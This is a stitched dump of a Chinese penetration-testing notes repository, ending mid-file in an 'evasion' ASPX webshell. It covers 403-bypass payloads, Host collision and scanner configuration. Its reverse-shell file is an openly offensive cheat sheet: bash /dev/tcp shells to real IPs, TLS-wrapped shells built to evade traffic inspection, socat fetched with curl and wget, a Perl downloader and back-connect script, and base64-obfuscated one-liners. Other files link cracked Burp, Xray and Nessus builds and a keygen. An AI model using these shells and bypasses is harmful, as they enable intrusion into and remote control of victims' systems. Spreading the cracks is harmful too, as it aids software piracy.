https://raw.githubusercontent.com/ybdt/pentest-hub/9c08865a027a3174463715c5da8dd30836f4a4e0/01-案例学习/爆破带有验证码的Web登录表单/爆破带有验证码的Web登录表单/04.png -------------------------------------------------------------------------------- /01-案例学习/爆破带有验证码的Web登录表单/爆破带有验证码的Web登录表单/05.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/pentest-hub/9c08865a027a3174463715c5da8dd30836f4a4e0/01-案例学习/爆破带有验证码的Web登录表单/爆破带有验证码的Web登录表单/05.png -------------------------------------------------------------------------------- /01-案例学习/爆破带有验证码的Web登录表单/爆破带有验证码的Web登录表单/06.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/ybdt/pentest-hub/9c08865a027a3174463715c5da8dd30836f4a4e0/01-案例学习/爆破带有验证码的Web登录表单/爆破带有验证码的Web登录表单/06.png -------------------------------------------------------------------------------- /01-案例学习/爆破带有验证码的Web登录表单/爆破带有验证码的Web登录表单/07.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/pentest-hub/9c08865a027a3174463715c5da8dd30836f4a4e0/01-案例学习/爆破带有验证码的Web登录表单/爆破带有验证码的Web登录表单/07.png -------------------------------------------------------------------------------- /01-案例学习/爆破带有验证码的Web登录表单/爆破带有验证码的Web登录表单/08.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/pentest-hub/9c08865a027a3174463715c5da8dd30836f4a4e0/01-案例学习/爆破带有验证码的Web登录表单/爆破带有验证码的Web登录表单/08.png -------------------------------------------------------------------------------- /01-案例学习/爆破带有验证码的Web登录表单/爆破带有验证码的Web登录表单/09.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/pentest-hub/9c08865a027a3174463715c5da8dd30836f4a4e0/01-案例学习/爆破带有验证码的Web登录表单/爆破带有验证码的Web登录表单/09.png -------------------------------------------------------------------------------- /01-案例学习/爆破带有验证码的Web登录表单/爆破带有验证码的Web登录表单/10.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/pentest-hub/9c08865a027a3174463715c5da8dd30836f4a4e0/01-案例学习/爆破带有验证码的Web登录表单/爆破带有验证码的Web登录表单/10.png -------------------------------------------------------------------------------- /01-案例学习/爆破带有验证码的Web登录表单/爆破带有验证码的Web登录表单/11.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/pentest-hub/9c08865a027a3174463715c5da8dd30836f4a4e0/01-案例学习/爆破带有验证码的Web登录表单/爆破带有验证码的Web登录表单/11.png -------------------------------------------------------------------------------- /01-案例学习/记一次常规的Bypass 宝塔防火墙 
文件上传.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ybdt/pentest-hub/9c08865a027a3174463715c5da8dd30836f4a4e0/01-案例学习/记一次常规的Bypass 宝塔防火墙 文件上传.pdf
--------------------------------------------------------------------------------
/02-资产收集/403绕过原理.md:
--------------------------------------------------------------------------------
I had long wanted to study 403 bypasses; after changing jobs I finally have time to do so

The principle, briefly:
The usual deployment puts nginx in front as a reverse proxy with a Java or PHP backend, and developers often restrict access to an interface by having nginx check the client IP or the request path. The bypasses below exploit the gap between the request the proxy checks and the request the backend actually interprets (different path normalization, trusted client-IP headers, URL-override headers), as follows:

# 01 Modify the URL path
```
site.com/admin => 403

site.com/admin/ => 200
site.com/random-dir/../admin => 200
site.com/random-dir/..;/admin => 200
site.com/random-dir/..%252F/admin => 200
site.com/admin// => 200
site.com//admin// => 200
site.com/admin/* => 200
site.com/admin/*/ => 200
site.com/admin/. => 200
site.com/admin/./ => 200
site.com/./admin/./ => 200
site.com/admin/./. => 200
site.com/admin? => 200
site.com/admin?? => 200
site.com/admin???
=> 200
site.com/admin..;/ => 200
site.com/admin/..;/ => 200
site.com/%2f/admin => 200
site.com/%2e/admin => 200
site.com/admin%20/ => 200
site.com/admin%09/ => 200
site.com/%20admin%20/ => 200
site.com/%0dadmin => 200
```
# 02 Spoof the client IP through headers
```
- X-Originating-IP: 127.0.0.1
- X-Remote-IP: 127.0.0.1
- X-Client-IP: 127.0.0.1
- X-Forwarded-For: 127.0.0.1
- X-Forwarded-Host: 127.0.0.1
- X-Host: 127.0.0.1
- X-Custom-IP-Authorization: 127.0.0.1
```
Example
```
Request
GET /auth/login HTTP/1.1
Response
HTTP/1.1 401 Unauthorized

Request
GET /auth/login HTTP/1.1
X-Custom-IP-Authorization: 127.0.0.1
Response
HTTP/1.1 200 OK
```
# 03 Modify the Referer header
The Referer header carries the address of the page from which the current request originated, i.e. the page whose link led here. Servers sometimes use Referer to decide where a request came from, as in this example:
```
Request
GET /auth/login HTTP/1.1
Host: xxx
Response
HTTP/1.1 403 Forbidden

Request
GET / HTTP/1.1
Host: xxx
Referer: https://xxx/auth/login
Response
HTTP/1.1 200 OK

or

Request
GET /auth/login HTTP/1.1
Host: xxx
Referer: https://xxx/auth/login
Response
HTTP/1.1 200 OK
```
# 04 Override the request URL
If the target honours the X-Original-URL or X-Rewrite-URL headers, the path in those headers replaces the path of the request URL at the backend, which can bypass restrictions applied by an upstream cache or web server that only saw the original path. Example:
```
Request
GET /auth/login HTTP/1.1
Response
HTTP/1.1 403 Forbidden

Request
GET / HTTP/1.1
X-Original-URL: /auth/login
Response
HTTP/1.1 200 OK

or

Request
GET / HTTP/1.1
X-Rewrite-URL: /auth/login
Response
HTTP/1.1 200 OK

```
# 05 Modify the Host header (the source article is not very clear on this part)
First, the role of the Host header: several websites or web systems are often deployed on one server, and the Host header tells the server which of them should handle the request. Many web applications also read the HTTP Host header to learn the location they are being accessed at, but many developers do not realize that the Host header is under the user's control, and from a security standpoint any user-controlled input must be treated as untrusted.
# 
05 端口利用 109 | 全端口扫描后,在其他端口可能会发现可未授权访问的web系统 110 | 111 | # 参考文章 112 | 113 | https://blog.csdn.net/st3pby/article/details/128485994 -------------------------------------------------------------------------------- /02-资产收集/Host碰撞原理.md: -------------------------------------------------------------------------------- 1 | 2 | 一直想学习下Host碰撞,换了新公司后终于有时间可以学习下 3 | 4 | # 0x01 漏洞原理 5 | 在当今的反向代理技术架构下,正常访问一个网站的流程是: 6 | 用户通过浏览器访问一个域名 -> 先在本地hosts文件中查询域名对应的IP,没查到的话再通过DNS查询域名对应的IP -> 访问查询到的IP并以最初访问的域名作为请求头中host字段的值 -> 反代服务器nginx根据host字段的值转发到对应的server_name下 7 | 8 | 补充一句:有些网站通过IP不能直接访问就是因为它本身是一个反代服务器,并且在配置文件中配置了不允许通过IP直接访问 9 | 10 | nginx配置文件——反代服务器,注释中包含对配置文件的解释: 11 | ``` 12 | server { 13 | listen 8080 default_server; # 指定当前为默认server 14 | 15 | # host为空时返回400 16 | server_name _; 17 | return 400; 18 | } 19 | server { 20 | listen 8080; 21 | 22 | # host为test.com时,转发到http://127.0.0.1:80 23 | server_name test.com; 24 | location { 25 | proxy_pass http://127.0.0.1:80; 26 | proxy_redirect off; 27 | proxy_set_header Host $host:$server_port; 28 | proxy_set_header X-Real-IP $remote_addr; 29 | root html; 30 | index index.html index.htm; 31 | } 32 | 33 | access_log logs/test.com.log; 34 | } 35 | ``` 36 | nginx配置文件——业务 37 | ``` 38 | server { 39 | listen 80; 40 | server_name localhost; 41 | location { 42 | root usr/share/nginx/html; 43 | index index.html index.htm; 44 | } 45 | error_page 500 502 503 504 50x.html; 46 | location = 50x.html { 47 | root usr/share/nginx/html; 48 | } 49 | } 50 | ``` 51 | 漏洞就出现在,当目标单位删除了DNS中host对应的IP,但是没有删除反代服务器中host对应的server,此时我们访问反代服务器的IP且host头中带有对应域名,若域名匹配反代服务器的server,则能够访问到内网业务 52 | 53 | # 漏洞利用 54 | 分析完了漏洞形成的原因,我们知道如果找到域名解析对应的IP,且访问IP时host头带上对应的域名,则可以访问目标单位的内部资产,那如何找到域名解析对应的IP,就需要大量的IP和域名来进行碰撞 55 | 56 | 参考工具:https://github.com/pmiaowu/HostCollision 57 | 58 | # 参考链接 59 | 团队内部分享:WEB非实用之host碰撞挖掘 60 | https://www.modb.pro/db/136373 -------------------------------------------------------------------------------- /03-漏洞检测/AWVS/awvs14-scan-master/README.md: 
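The 403 section above depends on two server-side mistakes: an access rule applied to the raw request path, and a client IP read from a header the visitor controls. The block below is an added example, not code from the pentest-hub repository, showing the defensive counterpart: canonicalize the path first, and derive the client IP by walking X-Forwarded-For only across hops that are known proxies; the proxy ranges, protected prefixes and internal ranges are constructed assumptions.

```python
"""Added example (not from the pentest-hub repo): authorize on the canonical
path and on a client IP derived only from trusted proxy hops."""
from ipaddress import ip_address, ip_network
from urllib.parse import unquote

# Constructed assumptions for the demo: the nginx tier lives in 10.0.0.0/8,
# and /admin and /auth are reserved for internal callers.
TRUSTED_PROXIES = [ip_network("10.0.0.0/8")]
PROTECTED_PREFIXES = ("/admin", "/auth")
INTERNAL_CLIENTS = [ip_network("127.0.0.0/8"), ip_network("10.0.0.0/8")]


def canonical_path(raw):
    """Reduce the path variants listed on the page to one canonical form.

    Handles repeated percent-decoding (%252F), dot segments, empty segments,
    Tomcat-style path parameters (..;/) and whitespace bytes (%20 %09 %0d).
    """
    path = raw.split("?", 1)[0].split("#", 1)[0]
    previous = None
    while previous != path:            # loop until stable to undo double encoding
        previous = path
        path = unquote(path)
    path = path.replace("\\", "/")
    segments = []
    for segment in path.split("/"):
        segment = segment.split(";", 1)[0]                       # "..;" -> ".."
        segment = "".join(c for c in segment if c not in " \t\r\n")
        if segment in ("", "."):
            continue
        if segment == "..":
            if segments:
                segments.pop()
            continue
        segments.append(segment)
    return "/" + "/".join(segments)


def is_protected(path):
    """Segment-aware prefix match: /admin and /admin/x, but not /administrator."""
    return any(path == p or path.startswith(p + "/") for p in PROTECTED_PREFIXES)


def client_ip(remote_addr, forwarded_for, trusted_proxies=TRUSTED_PROXIES):
    """Walk the forwarding chain backwards from the TCP peer.

    Every hop that is a trusted proxy is skipped; the first hop that is not
    one is the real client. A spoofed 127.0.0.1 that an external client puts
    at the left end of X-Forwarded-For is therefore never reached, and headers
    such as X-Client-IP or X-Custom-IP-Authorization are simply ignored.
    """
    chain = [remote_addr]
    if forwarded_for:
        chain = [h.strip() for h in forwarded_for.split(",") if h.strip()] + chain
    for hop in reversed(chain):
        try:
            addr = ip_address(hop)
        except ValueError:
            return None                  # unparsable hop: the client is unknown
        if not any(addr in net for net in trusted_proxies):
            return str(addr)
    return str(ip_address(chain[0]))     # every hop was one of our proxies


def authorize(raw_path, remote_addr, headers):
    """True if the request may proceed; protected paths need an internal client IP."""
    if not is_protected(canonical_path(raw_path)):
        return True
    ip = client_ip(remote_addr, headers.get("X-Forwarded-For", ""))
    if ip is None:
        return False
    return any(ip_address(ip) in net for net in INTERNAL_CLIENTS)


if __name__ == "__main__":
    for variant in ("/admin/./", "/random-dir/..%252F/admin", "/%20admin%20/"):
        print(variant, "->", canonical_path(variant))
    print(authorize("/admin", "203.0.113.5", {"X-Forwarded-For": "127.0.0.1"}))
```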
--------------------------------------------------------------------------------
/03-漏洞检测/AWVS/awvs14-scan-master/README.md:
--------------------------------------------------------------------------------
# Disclaimer
This project is only for security self-assessment. Do not use the tools and techniques in this article for illegal testing; any adverse consequences arising from that are unrelated to this project



This tool comes from the Zhishixingqiu (知识星球) group BugBounty漏洞赏金自动化:

![image](https://user-images.githubusercontent.com/50769953/167792916-20a9ee30-6f66-4f83-aa87-2c53e088565a.png)



## awvs14-scan
Supports AWVS 14 and 15; fixes several bugs; adds configuration parameters to config

Edit config.ini with a proper editor; Notepad will alter the original format

A batch scanning script developed for AWVS 14. Supports targeted scans for SpringShell, log4j, common CVEs, Bug Bounty, common high-risk issues, SQL injection, XSS and so on; supports chaining with xray, burp, w13scan and other passive scanners for batch scanning; flexible custom scan templates

```
********************************************************************
1 【批量添加url到AWVS扫描器扫描】
2 【删除扫描器内所有目标与扫描任务】
3 【删除所有扫描任务(不删除目标)】
4 【对扫描器中已有目标,进行扫描】

请输入数字:1
选择要扫描的类型:
1 【开始 完全扫描】
2 【开始 扫描高风险漏洞】
3 【开始 扫描XSS漏洞】
4 【开始 扫描SQL注入漏洞】
5 【开始 弱口令检测】
6 【开始 Crawl Only,,建议config.ini配置好上级代理地址,联动被动扫描器】
7 【开始 扫描意软件扫描】
8 【仅添加 目标到扫描器,不做任何扫描】
9 【仅扫描apache-log4j】(请需先确保当前版本已支持log4j扫描,awvs 14.6.211220100及以上)
10 【开始扫描Bug Bounty高频漏洞】
11 【扫描已知漏洞】(常见CVE,POC等)
12 【自定义模板】
13 【仅扫描Spring4ShellCVE-2022-22965】需确保当前版本已支持

请输入数字:?
```

## Features of the version-14 script
Only the AWVS 14 API is supported
* Batch-add URLs for scanning
* Batch-scan only for the apache-log4j vulnerability
* Attach a `cooKie` credential to the batch of URLs for crawler scanning
* Attach one or more custom request headers to the batch of URLs
* Configure an upstream proxy address so scans can be combined with passive scanners such as `xray`, `w13scan`, `burp`
* Clear all tasks with one command
* Customise scan parameters through `config.ini`: crawler speed, excluded paths (directories not to scan), a global `cookie`, restricting the crawl to the given address and its subdirectories
* Batch-scan targets already in the scanner, with a custom scan type



## Installing AWVS 14 on Linux with docker
docker is recommended
```
April 1 update: supports scanning for Spring4Shell (CVE-2022-22965)!!!

Install: docker pull xiaomimi8/docker-awvs-14.7.220401065

Start: docker run -it -d -p 13443:3443 xiaomimi8/docker-awvs-14.7.220401065

Login: Username:admin@admin.com password:Admin123
```

## Tip jar
If this helped you, how about buying the author a milk tea? (heh) 👍 (please leave your ID when tipping)

![](https://s3.bmp.ovh/imgs/2022/02/185eb77e0285777a.png)


--------------------------------------------------------------------------------
/03-漏洞检测/AWVS/awvs14-scan-master/config.ini:
--------------------------------------------------------------------------------
```ini
# basic settings
[awvs_url_key]
awvs_url=https://awvs.lan:3443
api_key=1986ad8c0a5b3df4d7028d5f3c06e936cae0628ec040b4125ba20fd8e2fd146e8

# file containing the urls to scan
domain_file=url-968.txt

## scan speed, slow to fast: sequential slow moderate fast; the faster the scan, the more it misses, and vice versa
[scan_seting]
scan_speed=moderate

# Cookie used during scanning, applied to every url; leave empty to let the scanner's crawler obtain it automatically; global for all urls
# example: cookie=BIDUPSID=D40B5A304EFD449C3F8DED17FDF633A0; PSTM=1592016294
cookie=

# one or more custom request headers, global for all urls
# example: custom_headers=["x-auth: 2986ad8c0a5b3","Referer: https://192.168.163.139:13443/"]
custom_headers=[]

# paths excluded from scanning, typically so that after adding a cookie the crawler does not trigger logout, sign-out or delete actions; global for all urls
# example: excluded_paths=['quit','exit','logout','Logout','delete','DELETE','注销','退出','删除']
excluded_paths=[]


## restrict crawling to the given address and its subdirectories; values: true (default) / False; False is recommended
limit_crawler_scope=False

## upstream proxy address, e.g. for chaining a passive scanner or debugging a target; global for all urls
# example: proxy_server=127.0.0.1:7777 (no http prefix; leave empty if none); proxy_enabled=False\True, case-sensitive
proxy_enabled=False
proxy_server=127.0.0.1:8080
```
--------------------------------------------------------------------------------
/03-漏洞检测/BurpSuite下repeater中request不能识别空格/readme.md:
--------------------------------------------------------------------------------
As the title says: during a penetration test I found that every SQL statement I constructed needed its spaces changed to %20 by hand, which was tedious, and I could not find a feature in burp that converts spaces to %20, so I wrote a Python script
```python
#!/usr/bin/python3

def main():
    var = input("Please input the string: ")
    encoded = ""
    for ch in var:
        if ch == " ":
            ch = "%20"      # replace each space with its URL encoding
        encoded += ch
    print(encoded)

main()
```

# Update 2021/03/11
It is normal for burp's repeater not to encode spaces automatically; browsers are the ones that encode spaces automatically
--------------------------------------------------------------------------------
/03-漏洞检测/BurpSuite下repeater出现中文乱码/readme.md:
--------------------------------------------------------------------------------
This started when, during an authorised penetration test, I found an SQL injection and, while enumerating databases, one database had a Chinese name; when I typed Chinese into repeater->request it came out garbled
I assumed my current Kali system lacked Chinese fonts, but the same thing happened on Win10
Searching online, the suggested fixes all amounted to User options->Display: change the font, change the character set; I tried them on Kali and Win10, still no effect
I considered some burp extensions, but after reading their descriptions none seemed useful; I also thought about a localised build, which in hindsight would probably not have helped either
I downloaded the latest burpsuite_community_windows-x64_v2020_5_1.exe and found that Chinese typed into repeater->request was no longer garbled, so I suspected the vendor had fixed this in some version. I had been using a cracked burpsuite pro v2.1.04, so I downloaded burpsuite_community_windows-x64_v2_1_04.exe and it was garbled; evidently the fix landed in some version after v2.1.04
To settle this once and for all, and avoid switching between the cracked burpsuite pro v2.1.04 and burpsuite_community_windows-x64_v2020_5_1.exe, I searched for the latest cracked build and found this article
https://xcxmiku.com/archives/38a7a949/
It provides a cracked burpsuite v2020.5.1; I verified the SHA256 values and they are correct

[About the download]
The original article shares the files through Baidu Netdisk, which downloaded extremely slowly for me; in the end I could not bear waiting and paid for a premium membership. To spare others the same problem, I am sharing it here through Tianyi Cloud, which I found to be reasonably fast
https://cloud.189.cn/t/VfiyyeYZnaQf (access code: 7xtq)
If this helped you, please give it a star

# Update 2021/03/11
I am now using the cracked burpsuite v2020.5.1 and it is still garbled
User options->Display->Character Sets->tick "Use a specific character set" and choose GB2312
No longer garbled
--------------------------------------------------------------------------------
/03-漏洞检测/BurpSuite激活指南/pic/1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ybdt/pentest-hub/9c08865a027a3174463715c5da8dd30836f4a4e0/03-漏洞检测/BurpSuite激活指南/pic/1.png
--------------------------------------------------------------------------------
/03-漏洞检测/BurpSuite激活指南/pic/readme.md:
--------------------------------------------------------------------------------

--------------------------------------------------------------------------------
/03-漏洞检测/BurpSuite激活指南/readme.md:
--------------------------------------------------------------------------------
Because burp has to be activated every time it is used on a new virtual machine, I wrote this note

Check the current Java version
```
java.exe -version
```
My version is
```
java version "1.8.0_181"
Java(TM) SE Runtime Environment (build 1.8.0_181-b13)
Java HotSpot(TM) 64-Bit Server VM (build 25.181-b13, mixed mode)
```
1. Run the following command to start the key generator
```
java.exe -jar .\burp-loader-keygen-2020_2_1.jar
```
As shown below
![image](./pic/1.png)
2. Run start_en-us.vbs directly to launch burp
3. Finally copy and paste the corresponding keys
--------------------------------------------------------------------------------
/03-漏洞检测/BurpSuite爆破时payload被url编码/readme.md:
--------------------------------------------------------------------------------
A challenge from Mozhe Academy (墨者学院), at:
https://www.mozhe.cn/bug/detail/WTNpdGxUS3l4dG9uMFF6ZEs3OEJCdz09bW96aGUmozhe
While using burp's intruder, the response said "ip违法" (invalid IP); on closer inspection the "." characters in the requested IP "128.0.0.2" had been encoded, giving "128%2e0%2e0%2e2"
Solution:
Remove "." from Intruder->Payloads->Payload Encoding

Reference:
https://nocbtm.github.io/2018/07/27/BurpSuit%20%E6%9A%B4%E5%8A%9B%E7%A0%B4%E8%A7%A3%E5%8F%A3%E4%BB%A4/
--------------------------------------------------------------------------------
/03-漏洞检测/BurpSuite被拦截怎么办/readme.md:
--------------------------------------------------------------------------------
Tools - Proxy - Miscellaneous

disable web interface and suppress burp error

Article backup: bp小tips-开启burp代理被拦截怎么办?.html
--------------------------------------------------------------------------------
/03-漏洞检测/Goby红队版尝试解密/readme.md:
--------------------------------------------------------------------------------
Seeing that the Goby red-team edition had added RCEs for Apache Solr, Apache Druid, Apache Log4j2 JNDI and Apache OFBiz, I was suddenly wide awake and wanted to capture the red-team edition's traffic to see whether the exp could be decrypted

I wanted to use wireshark but did not know how to filter the packets of a given process; after some googling, every answer said wireshark cannot filter by process

An answer on stackoverflow recommended Microsoft's Network Monitor, which supports filtering by process name
Reference: https://stackoverflow.com/questions/1339691/filter-by-process-pid-in-wireshark

Started trying Microsoft Network Monitor (pitfall 1: it must be run as administrator, otherwise no network adapters are shown)
Launched Network Monitor and opened firefox and the Goby red-team edition, as shown below
![image](./尝试解密goby红队版poc/01.png)
After starting the update, compared with the picture above, the second process gained an extra IP address, 104.21.32.82, which turned out to be a Cloudflare node; hard to deal with
![image](./尝试解密goby红队版poc/02.png)
Looking at the captured packets, nothing of interest
![image](./尝试解密goby红队版poc/03.png)
Looking at the local poc files again, they are unreadable too
![image](./尝试解密goby红队版poc/04.png)
The update also includes RCEs for "Symantec Advanced Threat Protection", vSphere and others; really tempting~
![image](./尝试解密goby红队版poc/05.png)
![image](./尝试解密goby红队版poc/06.png)
Since capturing during the update turned up nothing, try capturing during an attack. Think about the red-team edition's sending logic: it should first identify the target and then send the probe packets, so a target environment is needed; but downloading and installing vSphere is a hassle, so what to do? No problem, we have cyberspace search engines: find targets through a search engine, check them with goby, and capture the packets

```
IPv4.address==3.220.251.239
8.136.140.77
3.1.108.37
```
After capturing, the target was not contacted directly at host 3.220.251.239, and the packets were encrypted

My guess is that the red-team edition first sends a request to an intermediate server, which then sends the poc request to the target host; that is how the packets are kept encrypted

No solution for now!!!
--------------------------------------------------------------------------------
/03-漏洞检测/Goby红队版尝试解密/尝试解密goby红队版poc/01.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ybdt/pentest-hub/9c08865a027a3174463715c5da8dd30836f4a4e0/03-漏洞检测/Goby红队版尝试解密/尝试解密goby红队版poc/01.png
--------------------------------------------------------------------------------
/03-漏洞检测/Goby红队版尝试解密/尝试解密goby红队版poc/02.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ybdt/pentest-hub/9c08865a027a3174463715c5da8dd30836f4a4e0/03-漏洞检测/Goby红队版尝试解密/尝试解密goby红队版poc/02.png
--------------------------------------------------------------------------------
/03-漏洞检测/Goby红队版尝试解密/尝试解密goby红队版poc/03.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ybdt/pentest-hub/9c08865a027a3174463715c5da8dd30836f4a4e0/03-漏洞检测/Goby红队版尝试解密/尝试解密goby红队版poc/03.png
--------------------------------------------------------------------------------
/03-漏洞检测/Goby红队版尝试解密/尝试解密goby红队版poc/04.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ybdt/pentest-hub/9c08865a027a3174463715c5da8dd30836f4a4e0/03-漏洞检测/Goby红队版尝试解密/尝试解密goby红队版poc/04.png
--------------------------------------------------------------------------------
/03-漏洞检测/Goby红队版尝试解密/尝试解密goby红队版poc/05.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ybdt/pentest-hub/9c08865a027a3174463715c5da8dd30836f4a4e0/03-漏洞检测/Goby红队版尝试解密/尝试解密goby红队版poc/05.png
--------------------------------------------------------------------------------
/03-漏洞检测/Goby红队版尝试解密/尝试解密goby红队版poc/06.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ybdt/pentest-hub/9c08865a027a3174463715c5da8dd30836f4a4e0/03-漏洞检测/Goby红队版尝试解密/尝试解密goby红队版poc/06.png
--------------------------------------------------------------------------------
/03-漏洞检测/Nessus/readme.md:
--------------------------------------------------------------------------------
# Origin
A post seen on twitter: https://twitter.com/Elliot58616851
# Docker
```
https://github.com/elliot-bia/nessus

docker run -itd -p 8834:8834 ramisec/nessuslite
```
# Cracking method
```
Principle: enter the docker container and change the nessus web password

Steps:
cd /opt/nessus/sbin/
sudo ./nessuscli lsuser # list all users
sudo ./nessuscli chpasswd admin(the user whose password is to be updated) # update the password
Nessus_Ps0d
You will be asked to confirm twice
```
# Usage
https://rorschachchan.github.io/2018/01/23/使用Nessus进行漏洞扫描的过程/
--------------------------------------------------------------------------------
/03-漏洞检测/Xray/readme.md:
--------------------------------------------------------------------------------
# Cracking the advanced edition
```
xray v1.8.4 can be cracked by changing the system date, but this no longer works for later versions
xray v1.9.3 cracked build, downloaded from the WeChat public account 小阿辉谈安全
xray v1.9.4 cracked build, downloaded from: https://github.com/NHPT/Xray_Cracked
```

# Editing the configuration file
```
In config.yaml, remove the restriction on scanning government, education and similar targets (search for mitm)

To route the browser through xray, import ca.crt into the root certificate authorities of Firefox and Chrome

Change the number of workers: parallel: 100

plugins section
Set every sub-item under baseline to false; to exclude a particular poc, add it to exclude_poc: [poc-yaml-go-pprof-leak]

reverse section
Specify db_file_path and token, and change remote_server and http_base_url under client
```

# Setting up the reverse-connection platform
Upload xray_1.9.11_linux_amd64 and xray-license.lic to the cloud server

Step 1
```
Run ./xray_1.9.11_linux_amd64; it generates 4 configuration files: config.yaml, xray.yaml, module.xray.yaml, plugin.xray.yaml
```

Step 2
```
Edit the local config.yaml, reverse section
Set http enabled to true and specify listen_port
Set client remote_server to false
After editing, upload it to the cloud server to overwrite the original config.yaml
```
--------------------------------------------------------------------------------
/04-漏洞利用/20240701-JAVA环境下SQL注入WAF绕过.md:
--------------------------------------------------------------------------------
Article link:
https://mp.weixin.qq.com/s/B6wmJ40Det_eh7hLb8ozoA

Brief summary:
```
01 fastjson does not raise an error on fields the server does not have, so junk data can be used to bypass the WAF (jackson does raise an error on fields the server does not have)
02 Oracle comments
03 unicode encoding
04 full-width spaces
```
--------------------------------------------------------------------------------
/04-漏洞利用/20240704-Linux下反弹Shell.md:
--------------------------------------------------------------------------------
### 1. Determine which reverse-shell commands exist on the target
```
On the victim: whereis bash nc exec telnet python php perl ruby java go gcc g++
```
### 4. Reverse shell
```
bash reverse shell:
On the VPS: nc -n -v -lp 1024
On the victim: /bin/bash -i >& /dev/tcp//1024 0>&1
Note: when exploiting command injection from the URL bar or in burp, run: /bin/bash -i %3E%26 /dev/tcp/xx.xx.xx.xx/1024 0%3E%261

exec reverse shell: 0<&196;exec 196<>/dev/tcp//1024; sh <&196 >&196 2>&196

Other reverse-shell commands can be looked up in the Hack-Tools browser extension
```
### 5. Reverse shell that evades traffic inspection
```
Step 1, generate a key pair and certificate on the VPS:
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
Step 2, listen for the reverse shell on the VPS:
openssl s_server -quiet -key key.pem -cert cert.pem -port 443
Step 3, on the victim, wrap the reverse-shell traffic in TLS with openssl:
mkfifo /tmp/s;/bin/bash -i < /tmp/s 2>&1|openssl s_client -quiet -connect xx.xx.xx.xx > /tmp/s;rm /tmp/s
The VPS now has a dumb shell
```
### 6. Upgrade the dumb shell to a fully interactive shell
```
Step 1, in the dumb shell run:
python -c 'import pty;pty.spawn("/bin/bash")'
Step 2: press Ctrl-z to return to the VPS command line
Step 3, on the VPS run the following to return to the dumb shell:
stty raw -echo
fg
Step 4, in the dumb shell press Ctrl-l and run:
reset
export SHELL=bash
export TERM=xterm-256color
stty rows 54 columns 104
The shell on the VPS is now fully functional

If pressing Ctrl-z in the obtained shell exits the session, consider the socat approach:

Attacker:
socat file:`tty`,raw,echo=0 tcp-listen:4444
Victim:
curl -o /tmp/socat http://192.168.81.160:8000/socat   or   wget -O /tmp/socat http://192.168.81.160:8000/socat
chmod u+x /tmp/socat
/tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:192.168.81.160:4444
The resulting shell supports deleting characters, command history and Ctrl-c
```
### References:
https://www.freebuf.com/vuls/211847.html
https://saucer-man.com/information_security/233.html#cl-1



perl reverse shell
bash command that generates the download script:
```
echo use LWP::Simple\;\$url=\"http://1.1.1.1/r.txt\"\;\$coont=get\(\$url\)\;die \"not found link..\" if\(\!defined\(\$coont\)\)\;open \$file,\"\>r.pl\" or die \"couldn\'t open t.txt ..\\n\"\;print \$file \$coont\;close\(\$file\)\;exit\;>d.pl
```
Running it produces d.pl; running d.pl downloads r.pl; r.pl (the perl script used for the reverse connection) is:
```
use IO::Socket::INET;$p=fork;exit,if($p);foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(PeerAddr,"1.1.1.1:8080");STDIN->fdopen($c,r);$~->fdopen($c,w);while(<>){if($_=~/(.*)/){system $1;}};
```

#### perl has a reverse shell that does not invoke bash

1. bash reverse shell
On the attacker: nc -lvp 2333
On the victim:
```
bash -i >& /dev/tcp/1.1.1.1/2333 0>&1
```
# Bash reverse shell that evades traffic-inspection devices on Linux
```
bash -c 'exec bash -i &>/dev/tcp/120.48.45.46/12345 <&1'

bash -c bash${IFS}-i${IFS}>&/dev/tcp/120.48.45.46/12345<&1
```
Reference: https://blog.csdn.net/whatday/article/details/107098353

Use the Firefox extension HackTools to generate a base64-encoded reverse-shell command and substitute the base64 string below
```
bash -c {echo,L2Jpbi9zaCAtaSA+JiAvZGV2L3RjcC8zOS45OC4yNTAuNDcvMTIzNCAwPiYx}|{base64,-d}|{bash,-i}
```

```
bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjcuMC4wLjEvODAwMCAwPiYx}|{base64,-d}|{bash,-i}

where YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjcuMC4wLjEvODAwMCAwPiYx is the base64 encoding of bash -i >& /dev/tcp/127.0.0.1/8000 0>&1
```
--------------------------------------------------------------------------------
/04-漏洞利用/ASPX WebShell免杀/1.aspx:
--------------------------------------------------------------------------------
```csharp
<%@ WebHandler Language="C#" Class="ObjectDataProviderSpy" %>
<%@ Assembly Name="PresentationFramework,Version=4.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35" %>
<%@ Assembly Name="WindowsBase,Version=4.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35" %>
using System;
using System.Web;
using System.Text;
using System.Windows.Data;

///
/// Note: this program is only for experimenting with and learning the ObjectDataProvider class; do not abuse it unlawfully!
/// Source: ".NET advanced code audit, deserialization vulnerabilities", lesson 12, Gadget: ObjectDataProvider
/// Link: https://mp.weixin.qq.com/s/sHKR0zlW2CsphGAmv3_KVA
///
public partial class ObjectDataProviderSpy : IHttpHandler
{
    public bool IsReusable
    {
        get { return false; }
    }
    public static string EncodeBase64(string code_type, string code)
    {
        string encode = "";
        byte[] bytes = Encoding.GetEncoding(code_type).GetBytes(code);
        try
        {
            encode = Convert.ToBase64String(bytes);
        }
        catch
        {
            encode = code;
        }
        return encode;
    }
    public static string DecodeBase64(string code_type, string code)
    {
        string decode = "";
        byte[] bytes = Convert.FromBase64String(code);
        try
        {
